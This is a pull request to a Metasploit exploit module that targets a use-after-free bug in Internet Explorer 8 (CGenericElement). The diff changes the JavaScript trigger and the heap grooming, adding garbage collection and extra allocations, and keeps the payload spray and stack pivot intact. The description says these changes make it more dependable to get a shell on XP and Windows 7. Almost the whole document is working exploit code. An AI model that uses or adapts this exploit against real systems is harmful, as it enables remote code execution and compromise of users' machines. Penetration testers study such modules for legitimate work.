### PR TITLE
Modifies the exploit a little for better stability

### DIFF
--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -222,7 +222,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		<meta>
 			<?IMPORT namespace="t" implementation="#default#time2">
 		</meta>
-
 		<script>
 		#{js_mstime_malloc}
 
@@ -234,43 +233,36 @@ class Metasploit3 < Msf::Exploit::Remote
 			}
 			sparkle += unescape("AB");
 			sparkle += unescape("#{js_payload}");
-
 			magenta = unescape("#{align_esp}");
-
 			for (i=0; i < 0x70/4; i++) {
 				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
 				else               { magenta += unescape("#{align_esp}"); }
 			}
-
 			magenta += sparkle;
 
-			f0 = document.createElement('span');
-			document.body.appendChild(f0);
-			f1 = document.createElement('span');
-			document.body.appendChild(f1);
-			f2 = document.createElement('span');
-			document.body.appendChild(f2);
 			document.body.contentEditable="true";
+			f0 = document.createElement('span');
+			f1 = document.createElement('span');
+			f2 = document.createElement('span');
+			document.body.appendChild(f0);
+			document.body.appendChild(f1);
+			document.body.appendChild(f2);
+			for (i=0; i < 20; i++) { document.createElement("img"); }
 			f2.appendChild(document.createElement('datalist'));
 			f1.appendChild(document.createElement('span'));
+			CollectGarbage();
 			f1.appendChild(document.createElement('table'));
-
 			try      { f0.offsetParent=null;}
 			catch(e) { }
-
 			f2.innerHTML = "";
-			f0.appendChild(document.createElement('hr'));
 			f1.innerHTML = "";
-
-			CollectGarbage();
+			f0.appendChild(document.createElement('hr'));
 			mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 		}
-
 		</script>
 		</head>
 		<body onload="eval(helloWorld());">
 		<t:ANIMATECOLOR id="myanim"/>
-
 		</body>
 		</html>
 		|


### PR DESCRIPTION
Without this patch, it looks like the 1st attempt tends to fail first, but then IE recovers from the crash, and then that's how we get a shell.

This patch makes sure the LFH is enabled before the CGenericElement object is created.  Trigger is also modified a little.  Seems better.

Tested on XP SP3 + IE 8 and Win 7 + IE8
